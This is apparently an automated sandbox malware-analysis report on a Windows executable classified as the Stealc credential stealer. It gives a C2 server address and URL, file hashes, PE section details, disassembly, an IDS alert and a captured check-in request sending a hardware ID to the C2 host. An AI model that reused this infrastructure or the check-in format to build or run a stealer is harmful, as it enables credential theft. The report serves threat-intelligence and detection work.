                high
                ax-0001.ax-msedge.net
                150.171.28.10
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.phpfalse
                    high
                    http://185.215.113.206/false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.206/c4becf79229cb002.php9file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://185.215.113.206/pfile.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2239380826.0000000000D36000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://185.215.113.206tDfile.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://185.215.113.206file.exe, 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://185.215.113.206/c4becf79229cb002.phpI9file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://185.215.113.206/c4becf79229cb002.phpy9file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://185.215.113.206/c4becf79229cb002.phpu9file.exe, 00000000.00000002.2239380826.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.206
                              unknownPortugal
                              206894WHOLESALECONNECTIONSNLtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1561860
                              Start date and time:2024-11-24 14:55:11 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 56s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:12
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 79%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 127
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.198.119.84, 23.218.208.109
                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.206file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206/c4becf79229cb002.php
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              bg.microsoft.map.fastly.netfile.exeGet hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              ListaItensVistoriaCorpodeBombeirosObrigatorio.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.210.172
                              registration.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.214.172
                              Digital.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.214.172
                              file_66efd0132ceed.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.214.172
                              Guidelines_for_Citizen_Safety.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.210.172
                              e0#U05ea.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.214.172
                              ReceitaFederal-consulta-yFZMA-45896_v.3_35687.msiGet hashmaliciousAteraAgentBrowse
                              • 199.232.214.172
                              zapret.exeGet hashmaliciousUnknownBrowse
                              • 199.232.214.172
                              canva.batGet hashmaliciousUnknownBrowse
                              • 199.232.210.172
                              ax-0001.ax-msedge.netlw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                              • 150.171.27.10
                              17324340651fd0721b4a9b07278d0f63e6333ccd4883a9dc52eb27994b32b0d64dfb919b72906.dat-decoded.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                              • 150.171.28.10
                              ORDER 08757646566535857_95877465434-1.exeGet hashmaliciousFormBookBrowse
                              • 150.171.28.10
                              file.exeGet hashmaliciousStealcBrowse
                              • 150.171.27.10
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 150.171.27.10
                              file.exeGet hashmaliciousUnknownBrowse
                              • 150.171.27.10
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 150.171.27.10
                              file.exeGet hashmaliciousCredential FlusherBrowse
                              • 150.171.27.10
                              17323828261cfef277a3375a886445bf7f5a834ebb1cc85e533e9ac93595cd0e56ebd12426132.dat-decoded.exeGet hashmaliciousXWormBrowse
                              • 150.171.27.10
                              https://myqrcode.mobi/qr/3c3aa5e1/viewGet hashmaliciousUnknownBrowse
                              • 150.171.27.10
                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                              WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
                              - | file.exe | malicious | LummaC Stealer | 185.215.113.16
                              - | file.exe | malicious | Stealc | 185.215.113.206
                              - | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
                              - | file.exe | malicious | Stealc | 185.215.113.206
                              - | file.exe | malicious | LummaC Stealer | 185.215.113.16
                              - | file.exe | malicious | Stealc | 185.215.113.206
                              - | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206
                              - | file.exe | malicious | LummaC Stealer | 185.215.113.16
                              - | file.exe | malicious | Stealc | 185.215.113.206
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.944606592651316
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'821'184 bytes
                              MD5:63467d79a3f868e98b2560394e80345f
                              SHA1:fc3bca2a34ae3511f229f34483471a3804c4c24e
                              SHA256:dbc2fd08e4e008755e38c372dfca2d459535a27df0c9ee97abeed7fb186a42a3
                              SHA512:ab3e25780704d550a83dd008775c9cdf2745b05c4a70797cd4b29277975c655ef1ea261a0a55d83066eb405fd36e47b3b4953fdf09288c4f4234779ea33a7193
                              SSDEEP:49152:Ja/zZhic2/wQ2aaWguehh3MJpyRvPSqoqQI17lz5Fj:JabZNaTa3MJpqoqTD
                              TLSH:C585331A55793FF3D162BCF0ABDC8225D2E01625601D365A6409A7EEF87AFCCD4032B9
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa9c000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Instruction
                              jmp 00007F052C803DEAh
                              push gs
                              sbb eax, dword ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007F052C805DE5h
                              add byte ptr [ecx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+00h], ah
                              add byte ptr [eax], al
                              and al, 91h
                              int1
                              sldt word ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [ecx], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [edx], ecx
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              push es
                              add byte ptr [eax], 00000000h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 0Ah
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              (unnamed) | 0x1000 | 0x249000 | 0x16200 | 65ede471ce3a591a6879a3a3f6d5e3d8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc | 0x24a000 | 0x2b0 | 0x200 | af6b08b359fbdefb44f86e86bc7403bf | False | 0.798828125 | data | 6.041567286194159 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              (unnamed) | 0x24c000 | 0x2ac000 | 0x200 | 2f3f430851da4447a91ecdfcbfad8e2e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              woldotvo | 0x4f8000 | 0x1a3000 | 0x1a2c00 | 45fd2c6e81059352fd590303887416cd | False | 0.9947469682835821 | data | 7.953105657448845 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              cpkeohyv | 0x69b000 | 0x1000 | 0x400 | c15d5601c72afb6084b9dce4fbdfaca9 | False | 0.7734375 | data | 6.041920132610716 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant | 0x69c000 | 0x3000 | 0x2200 | 1b4657d8a10165ff6a0331506bae1912 | False | 0.068359375 | DOS executable (COM) | 0.7719551230123033 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                              RT_MANIFEST | 0x69a8c8 | 0x256 | ASCII text, with CRLF line terminators | - | - | 0.5100334448160535
                              DLL | Import
                              kernel32.dll | lstrcpy
                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                              2024-11-24T14:56:18.703528+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49723 | 185.215.113.206 | 80 | TCP
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Nov 24, 2024 14:56:16.748410940 CET | 49723 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 24, 2024 14:56:16.868139029 CET | 80 | 49723 | 185.215.113.206 | 192.168.2.6
                              Nov 24, 2024 14:56:16.868262053 CET | 49723 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 24, 2024 14:56:16.869250059 CET | 49723 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 24, 2024 14:56:16.991336107 CET | 80 | 49723 | 185.215.113.206 | 192.168.2.6
                              Nov 24, 2024 14:56:18.244362116 CET | 80 | 49723 | 185.215.113.206 | 192.168.2.6
                              Nov 24, 2024 14:56:18.244430065 CET | 49723 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 24, 2024 14:56:18.250592947 CET | 49723 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 24, 2024 14:56:18.370989084 CET | 80 | 49723 | 185.215.113.206 | 192.168.2.6
                              Nov 24, 2024 14:56:18.703416109 CET | 80 | 49723 | 185.215.113.206 | 192.168.2.6
                              Nov 24, 2024 14:56:18.703527927 CET | 49723 | 80 | 192.168.2.6 | 185.215.113.206
                              Nov 24, 2024 14:56:21.502793074 CET | 49723 | 80 | 192.168.2.6 | 185.215.113.206
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Nov 24, 2024 14:56:45.697779894 CET | 1.1.1.1 | 192.168.2.6 | 0x2b20 | No error (0) | g-bing-com.ax-0001.ax-msedge.net | ax-0001.ax-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                              Nov 24, 2024 14:56:45.697779894 CET | 1.1.1.1 | 192.168.2.6 | 0x2b20 | No error (0) | ax-0001.ax-msedge.net | - | 150.171.28.10 | A (IP address) | IN (0x0001) | false
                              Nov 24, 2024 14:56:45.697779894 CET | 1.1.1.1 | 192.168.2.6 | 0x2b20 | No error (0) | ax-0001.ax-msedge.net | - | 150.171.27.10 | A (IP address) | IN (0x0001) | false
                              Nov 24, 2024 14:57:01.577508926 CET | 1.1.1.1 | 192.168.2.6 | 0x196f | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                              Nov 24, 2024 14:57:01.577508926 CET | 1.1.1.1 | 192.168.2.6 | 0x196f | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                              • 185.215.113.206
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.6 | 49723 | 185.215.113.206 | 80 | 4576 | C:\Users\user\Desktop\file.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 24, 2024 14:56:16.869250059 CET | 90 | OUT | GET / HTTP/1.1
                              Host: 185.215.113.206
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Nov 24, 2024 14:56:18.244362116 CET | 203 | IN | HTTP/1.1 200 OK
                              Date: Sun, 24 Nov 2024 13:56:18 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Nov 24, 2024 14:56:18.250592947 CET | 412 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFI
                              Host: 185.215.113.206
                              Content-Length: 210
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 30 45 33 34 32 35 34 38 35 33 30 32 35 39 39 37 34 31 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 2d 2d 0d 0a
                              Data Ascii: ------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="hwid"F5D0E3425485302599741------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="build"mars------CAEHCFCBKKJDGCAKFCFI--
                              Nov 24, 2024 14:56:18.703416109 CET | 210 | IN | HTTP/1.1 200 OK
                              Date: Sun, 24 Nov 2024 13:56:18 GMT
                              Server: Apache/2.4.41 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=


                              Target ID:0
                              Start time:08:56:12
                              Start date:24/11/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0x4d0000
                              File size:1'821'184 bytes
                              MD5 hash:63467D79A3F868E98B2560394E80345F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2239380826.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2189567754.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:4.7%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:16.3%
                                Total number of Nodes:1403
                                Total number of Limit Nodes:28
                                execution_graph 27309 4e8615 48 API calls 27264 4ee049 147 API calls 27299 4e8615 49 API calls 27273 4f3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27310 4f33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27284 4e3959 244 API calls 27289 4e01d9 126 API calls 27265 4f2853 lstrcpy 27274 4f2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27266 4d5869 57 API calls 27292 4e1269 408 API calls 27286 4f2d60 11 API calls 27301 4f2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27267 4d8c79 strcpy_s 27302 4d1b64 162 API calls 27311 4dbbf9 90 API calls 27296 4ef2f8 93 API calls 27275 4ee0f9 140 API calls 27303 4e6b79 138 API calls 27269 4e4c77 295 API calls 25827 4f1bf0 25879 4d2a90 25827->25879 25831 4f1c03 25832 4f1c29 lstrcpy 25831->25832 25833 4f1c35 25831->25833 25832->25833 25834 4f1c6d GetSystemInfo 25833->25834 25835 4f1c65 ExitProcess 25833->25835 25836 4f1c7d ExitProcess 25834->25836 25837 4f1c85 25834->25837 25980 4d1030 GetCurrentProcess VirtualAllocExNuma 25837->25980 25842 4f1cb8 25992 4f2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25842->25992 25843 4f1ca2 25843->25842 25844 4f1cb0 ExitProcess 25843->25844 25846 4f1cbd 25847 4f1ce7 lstrlen 25846->25847 26201 4f2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25846->26201 25851 4f1cff 25847->25851 25849 4f1cd1 25849->25847 25853 4f1ce0 ExitProcess 25849->25853 25850 4f1d23 lstrlen 25852 4f1d39 25850->25852 25851->25850 25854 4f1d13 lstrcpy lstrcat 25851->25854 25855 4f1d5a 25852->25855 25857 4f1d46 lstrcpy lstrcat 25852->25857 25854->25850 25856 4f2ad0 3 API calls 25855->25856 25858 4f1d5f lstrlen 25856->25858 25857->25855 25860 4f1d74 25858->25860 25859 4f1d9a lstrlen 25861 4f1db0 25859->25861 25860->25859 25862 4f1d87 lstrcpy lstrcat 25860->25862 25863 4f1dce 25861->25863 25864 4f1dba lstrcpy lstrcat 25861->25864 25862->25859 25994 4f2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25863->25994 25864->25863 25866 4f1dd3 lstrlen 
25867 4f1de7 25866->25867 25868 4f1df7 lstrcpy lstrcat 25867->25868 25869 4f1e0a 25867->25869 25868->25869 25870 4f1e28 lstrcpy 25869->25870 25871 4f1e30 25869->25871 25870->25871 25872 4f1e56 OpenEventA 25871->25872 25873 4f1e8c CreateEventA 25872->25873 25874 4f1e68 CloseHandle Sleep OpenEventA 25872->25874 25995 4f1b20 GetSystemTime 25873->25995 25874->25873 25874->25874 25878 4f1ea5 CloseHandle ExitProcess 26202 4d4a60 25879->26202 25881 4d2aa1 25882 4d4a60 2 API calls 25881->25882 25883 4d2ab7 25882->25883 25884 4d4a60 2 API calls 25883->25884 25885 4d2acd 25884->25885 25886 4d4a60 2 API calls 25885->25886 25887 4d2ae3 25886->25887 25888 4d4a60 2 API calls 25887->25888 25889 4d2af9 25888->25889 25890 4d4a60 2 API calls 25889->25890 25891 4d2b0f 25890->25891 25892 4d4a60 2 API calls 25891->25892 25893 4d2b28 25892->25893 25894 4d4a60 2 API calls 25893->25894 25895 4d2b3e 25894->25895 25896 4d4a60 2 API calls 25895->25896 25897 4d2b54 25896->25897 25898 4d4a60 2 API calls 25897->25898 25899 4d2b6a 25898->25899 25900 4d4a60 2 API calls 25899->25900 25901 4d2b80 25900->25901 25902 4d4a60 2 API calls 25901->25902 25903 4d2b96 25902->25903 25904 4d4a60 2 API calls 25903->25904 25905 4d2baf 25904->25905 25906 4d4a60 2 API calls 25905->25906 25907 4d2bc5 25906->25907 25908 4d4a60 2 API calls 25907->25908 25909 4d2bdb 25908->25909 25910 4d4a60 2 API calls 25909->25910 25911 4d2bf1 25910->25911 25912 4d4a60 2 API calls 25911->25912 25913 4d2c07 25912->25913 25914 4d4a60 2 API calls 25913->25914 25915 4d2c1d 25914->25915 25916 4d4a60 2 API calls 25915->25916 25917 4d2c36 25916->25917 25918 4d4a60 2 API calls 25917->25918 25919 4d2c4c 25918->25919 25920 4d4a60 2 API calls 25919->25920 25921 4d2c62 25920->25921 25922 4d4a60 2 API calls 25921->25922 25923 4d2c78 25922->25923 25924 4d4a60 2 API calls 25923->25924 25925 4d2c8e 25924->25925 25926 4d4a60 2 API calls 25925->25926 25927 4d2ca4 25926->25927 25928 4d4a60 2 API calls 25927->25928 25929 4d2cbd 25928->25929 25930 
4d4a60 2 API calls 25929->25930 25931 4d2cd3 25930->25931 25932 4d4a60 2 API calls 25931->25932 25933 4d2ce9 25932->25933 25934 4d4a60 2 API calls 25933->25934 25935 4d2cff 25934->25935 25936 4d4a60 2 API calls 25935->25936 25937 4d2d15 25936->25937 25938 4d4a60 2 API calls 25937->25938 25939 4d2d2b 25938->25939 25940 4d4a60 2 API calls 25939->25940 25941 4d2d44 25940->25941 25942 4d4a60 2 API calls 25941->25942 25943 4d2d5a 25942->25943 25944 4d4a60 2 API calls 25943->25944 25945 4d2d70 25944->25945 25946 4d4a60 2 API calls 25945->25946 25947 4d2d86 25946->25947 25948 4d4a60 2 API calls 25947->25948 25949 4d2d9c 25948->25949 25950 4d4a60 2 API calls 25949->25950 25951 4d2db2 25950->25951 25952 4d4a60 2 API calls 25951->25952 25953 4d2dcb 25952->25953 25954 4d4a60 2 API calls 25953->25954 25955 4d2de1 25954->25955 25956 4d4a60 2 API calls 25955->25956 25957 4d2df7 25956->25957 25958 4d4a60 2 API calls 25957->25958 25959 4d2e0d 25958->25959 25960 4d4a60 2 API calls 25959->25960 25961 4d2e23 25960->25961 25962 4d4a60 2 API calls 25961->25962 25963 4d2e39 25962->25963 25964 4d4a60 2 API calls 25963->25964 25965 4d2e52 25964->25965 25966 4f6390 GetPEB 25965->25966 25967 4f65c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25966->25967 25968 4f63c3 25966->25968 25969 4f6638 25967->25969 25970 4f6625 GetProcAddress 25967->25970 25975 4f63d7 20 API calls 25968->25975 25971 4f666c 25969->25971 25972 4f6641 GetProcAddress GetProcAddress 